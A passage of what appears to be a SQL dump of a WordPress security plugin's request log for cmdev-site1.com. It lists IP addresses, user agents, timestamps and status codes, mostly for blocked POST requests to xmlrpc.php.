Safari\\/537.1\"}','DoWz3AsikqhmVNKyaX4lQPTd',0,1681189925.9023,652,'','POST',403,0,515,0,1,'',0),('182.92.129.110',3059515758,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Mdfs0I9G85wmp1KrvFk4SaOU',0,1681189926.7640,714,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','GgoedPSZOfq260pNvQ7mzbFi',0,1681189941.3419,580,'','POST',403,0,515,0,1,'',0),('213.152.162.5',3583549957,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Skow6v0KxLR3GBNsTYHI8ACO',0,1681191235.8435,5102,'','POST',403,0,515,0,1,'',0),('185.156.174.155',3114053275,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','XQ6rwaD15JjkxB4ZgF2lp3i9',0,1681191871.7167,3009,'','POST',403,0,515,0,1,'',0),('185.156.174.155',3114053275,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','EGC9FhSgAilHKY0NWoLcD74u',0,1681191921.5695,6186,'','POST',403,0,515,0,1,'',0),('107.167.244.67',1806169155,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vJcnRAyu29Ha75XjCkgfWzO3',0,1681192206.7401,3555,'','POST',403,0,515,0,1,'',0),('65.20.75.229',1091849189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','X0Bf6dCKzsI5W4YDeZngFbtN',0,1681192494.0326,3486,'','POST',403,0,515,0,1,'',0),('185.182.56.188',3115727036,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','nZL16TaVMg0XRDusiqvk2ypw',0,1681192498.9304,1517,'','POST',403,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','imBOlYs01V3ktwf4LCDEvh2T',0,1681192499.2629,1499,'','POST',403,0,515,0,1,'',0),('159.223.71.186',2682210234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','XD2jf4kimIhFTLxlNto7eHg6',0,1681192500.4432,857,'','POST',403,0,515,0,1,'',0),('175.178.36.28',2947687452,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','CWhG3RNTtqrFEkOVKpYPe5w0',0,1681192506.7051,710,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','ngJYmMRsWABp35fXz7IvkH2K',0,1681192513.0987,619,'','POST',403,0,515,0,1,'',0),('148.72.210.101',2487800421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','2OCF7MPKvYmsAr9H6GWBbSLu',0,1681192514.5125,583,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','pYybSesWL9QzgDcfkvtH1Co3',0,1681192518.3896,568,'','POST',403,0,515,0,1,'',0),('202.29.82.3',3390919171,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','z4Br1HjugXwRMPeZbFIcx8UC',0,1681192528.1289,756,'','POST',403,0,515,0,1,'',0),('46.105.97.186',778658234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','9tMZRyeUS0QYbq1vV6TN8JCj',0,1681192529.8088,614,'','POST',403,0,515,0,1,'',0),('185.216.214.24',3117995544,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','P495asbRBYkqUn2dZOA3Li1V',0,1681192531.1330,592,'','POST',403,0,515,0,1,'',0),('82.102.23.139',1382422411,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','7S2mwVJPeC1xMkosOt3RgKEQ',0,1681194090.5124,3646,'','POST',403,0,515,0,1,'',0),('184.75.221.43',3091979563,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','3RwA1MC05BZHJIlsnL6eXft4',0,1681194946.2069,4488,'','POST',403,0,515,0,1,'',0),('31.3.152.100',520329316,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','8lxECsA9Qoqj7PTtWnLiIFVG',0,1681194989.2006,3599,'','POST',403,0,515,0,1,'',0),('194.187.251.155',3267099547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','foyXqtI1Fx2VQG65wCRlmZJ8',0,1681197133.6547,791,'','POST',403,0,515,0,1,'',0),('184.75.223.195',3091980227,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','tq0G6EYmuFsZzpJC9A1VWRSv',0,1681199128.4252,5057,'','POST',403,0,515,0,1,'',0),('134.19.179.211',2249438163,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','zjgE1ZoLYxyJFmKDf0XilbHp',0,1681199341.9968,3157,'','POST',403,0,515,0,1,'',0),('146.70.115.139',2454090635,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','0Ea4L89GofuYXKxB6pnCiyRD',0,1681206767.2256,3564,'','POST',403,0,515,0,1,'',0),('185.200.116.203',3116922059,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','XHjAF4MxgZnys760Q29SINVc',0,1681208916.6681,5490,'','POST',403,0,515,0,1,'',0),('173.44.55.179',2905356211,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','b5gYx3PNOzXMtGFs4TBHRukL',0,1681209958.7761,1932,'','POST',403,0,515,0,1,'',0),('213.152.161.10',3583549706,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Nrw0ymEi8dXUsQSeT5pD7zGj',0,1681211027.5570,1486,'','POST',403,0,515,0,1,'',0),('184.75.223.219',3091980251,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','nQbLAOs5qajWfr19lTiKIxU4',0,1681211969.1161,3730,'','POST',403,0,515,0,1,'',0),('184.75.223.219',3091980251,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','hof13z7xAkSlDgbPt8OXQZUp',0,1681212117.9478,1367,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','pdXiAskKSu2ntHL5CcalfqBw',0,1681212183.1661,585,'','POST',403,0,515,0,1,'',0),('66.94.107.15',1113484047,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','bIo3j70UsBygcYP5zrH8WZTS',0,1681212188.5549,726,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','iUGoBTzqPDgtEwXjNkrQy5xS',0,1681212189.1807,775,'','POST',403,0,515,0,1,'',0),('103.71.99.168',1732731816,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','4CTouJvhr6N17fPU5d0QckIw',0,1681212190.0394,568,'','POST',403,0,515,0,1,'',0),('92.205.17.155',1556943259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','CEwSzem1psZgGWnQvfjD9rIM',0,1681212198.4337,573,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','1hDgVqjFeBvUAKuolCc7P5ri',0,1681212200.1135,546,'','POST',403,0,515,0,1,'',0),('184.168.98.254',3098043134,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','YyGIsC1zZLXkjwNr86gOB0Ha',0,1681212202.1724,552,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','md6uXI15cMGvHolNbkYL32wW',0,1681212208.4959,569,'','POST',403,0,515,0,1,'',0),('210.65.139.75',3527510859,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','I320ZxaXKwD4C9zfcW6L8FvG',0,1681212216.7879,579,'','POST',403,0,515,0,1,'',0),('184.75.221.35',3091979555,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','CzgHmT5BZf1DoqGynXvIEaNc',0,1681212636.4414,2247,'','POST',403,0,515,0,1,'',0),('213.152.161.10',3583549706,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ZyI8dNl2js39fgtDVHPOXFBA',0,1681213583.7679,3807,'','POST',403,0,515,0,1,'',0),('162.219.176.3',2732306435,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','85JzdTDUSKmw2jrQ4Bke1nPZ',0,1681215781.2108,4225,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','Nk1smTlexOr6fdWi49DYC3ua',0,1681215966.4206,962,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','ptalO9ZR2bd8G6I1TXDe7CMv',0,1681215966.9647,914,'','POST',403,0,515,0,1,'',0),('142.93.223.16',2388516624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-G960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','lnBIiQcNrVmJRko49fZx7FWG',0,1681215970.4908,627,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','OK9TelASJ2IYihbtpyfnz1gQ',0,1681217181.7950,414,'','POST',404,0,515,0,1,'',0),('45.130.104.194',763521218,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','q7howSUJaNWmDLBXTF8zbeKj',0,1681217183.6493,901,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','pZncY7aksCS1zHrwlQFMAR8J',0,1681217193.8127,735,'','POST',403,0,515,0,1,'',0),('142.132.196.233',2391065833,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','m9NSOXJgWr3etGRos2LMAhyH',0,1681217194.6800,1409,'','POST',403,0,515,0,1,'',0),('82.65.248.18',1380055058,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','HAGEPquBSKFv80Ui2LsCpylW',0,1681217194.7884,1300,'','POST',403,0,515,0,1,'',0),('1.20.253.226',18152930,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','cltnARp0aQsbuSYIEZo9PzO5',0,1681217204.0931,561,'','POST',403,0,515,0,1,'',0),('67.198.116.43',1137079339,'','http://cmdev-site1.com/the-wild-hunt/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\",\"2\":\"http:\\/\\/cmdev-site1.com\\/the-wild-hunt\\/?redirect_to=http%3A%2F%2Fcmdev-site1.com%2Fwp-admin%2Fadmin.php%3Fpage%3Dgf_entries%26view%3Dentries%26id%3D1%26filter&reauth=1\"}','Kqu1HxRnOA0rwUbFgo8LYDph',3,1681217489.2531,400,'','POST',302,0,600,0,1,'',510),('103.124.94.44',1736203820,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','HNUYinwxhEQlMOSrgACBIc0o',0,1681217536.7830,879,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','bIn01ZxD9wmFOqpsW3uikEHL',0,1681217537.3539,787,'','POST',403,0,515,0,1,'',0),('68.183.179.155',1152889755,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','rTdtNWiabyMZBefskvc1GF6X',0,1681217549.5268,1245,'','POST',403,0,515,0,1,'',0),('136.243.5.53',2297627957,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','q5py8SICwiAXYZU7OK6QEbnm',0,1681217549.8409,1233,'','POST',403,0,515,0,1,'',0),('91.204.46.91',1540107867,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','3mYGTfix72ZDJyzu0EO4hpSr',0,1681217553.1019,584,'','POST',403,0,515,0,1,'',0),('164.132.84.209',2760135889,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','cB2Nebvhr4zxIKtinMT8XRgw',0,1681217559.6242,554,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','Pwu5IJMdLxE1r98Z7YKO4CH2',0,1681217564.7338,625,'','POST',403,0,515,0,1,'',0),('86.48.1.153',1445986713,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','YEvJ9BkKjmzL0oMlPaI4XRCA',0,1681217570.6602,603,'','POST',403,0,515,0,1,'',0),('184.75.223.235',3091980267,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','hmIgHdqEwefK2sUjcMoFTPvi',0,1681218621.3458,4948,'','POST',403,0,515,0,1,'',0),('213.152.161.133',3583549829,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ge97wHQT1CZrmYd3fo6yMSRv',0,1681221025.7548,3244,'','POST',403,0,515,0,1,'',0),('62.102.148.187',1046910139,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','siFDOHgBroNaIhpbMK3RCmk8',0,1681223769.9628,625,'','POST',403,0,515,0,1,'',0),('144.76.57.230',2420914662,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','ReLHSMXt8A5cogWw40IQEspZ',0,1681223892.2958,639,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','8cBOA6Kd3TqhvJQE1NLXojr2',0,1681223900.3946,659,'','POST',403,0,515,0,1,'',0),('86.48.1.153',1445986713,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','lKNBc4xnQREdYgohMkPvi67A',0,1681223902.3188,2631,'','POST',403,0,515,0,1,'',0),('201.149.91.174',3382008750,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','CanP3HMrE9zgopQxGhTqAtKD',0,1681223913.2157,563,'','POST',403,0,515,0,1,'',0),('95.111.255.131',1601175427,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','lLTaXkFdEt1nBiYHyVN9qxwI',0,1681223918.5483,603,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','QxHqoLrENevaRVwC4yOP3itd',0,1681223919.7222,640,'','POST',403,0,515,0,1,'',0),('89.249.74.218',1509509850,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','pj31EXJFuqsK7YO9TBc5xtdQ',0,1681224512.5068,635,'','POST',403,0,515,0,1,'',0),('213.152.161.211',3583549907,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','0xdM51eNpzROgCo7KZiEHAUG',0,1681225188.7418,714,'','POST',403,0,515,0,1,'',0),('202.148.152.19',3398735891,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','4LlPKquOjkNt62pf7r58JzYD',0,1681229910.7403,565,'','POST',403,0,515,0,1,'',0),('157.90.161.243',2639962611,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','kxmU0BJoODSzPa2cdGYe3n7i',0,1681229916.3118,626,'','POST',403,0,515,0,1,'',0),('213.152.162.149',3583550101,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','XapWbmtvqUjcsGFJnICleKH8',0,1681231181.7665,4484,'','POST',403,0,515,0,1,'',0),('213.152.187.210',3583556562,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','n3BrR5TLabvcpPljId7sSU1Z',0,1681231634.6801,3472,'','POST',403,0,515,0,1,'',0),('199.249.230.12',3355043340,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','go7jhkI40H1mcqydLrz6OX5U',0,1681232046.3351,3610,'','POST',403,0,515,0,1,'',0),('150.60.157.163',2520554915,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','yBJr0TgCmdRAO9wSxfiXl3aV',0,1681235073.7461,894,'','POST',403,0,515,0,1,'',0),('104.168.156.57',1755880505,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','xosPihkeFbdIDL5cYqQTjtUE',0,1681235079.2611,580,'','POST',403,0,515,0,1,'',0),('213.165.236.212',3584421076,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','dnADkKVITeYJwfZ5jmotQ3HO',0,1681235081.5921,594,'','POST',403,0,515,0,1,'',0),('159.65.152.207',2671876303,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','fS4eonOAEmGC8lUV9YzILpkg',0,1681235083.8712,811,'','POST',403,0,515,0,1,'',0),('104.254.90.195',1761499843,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 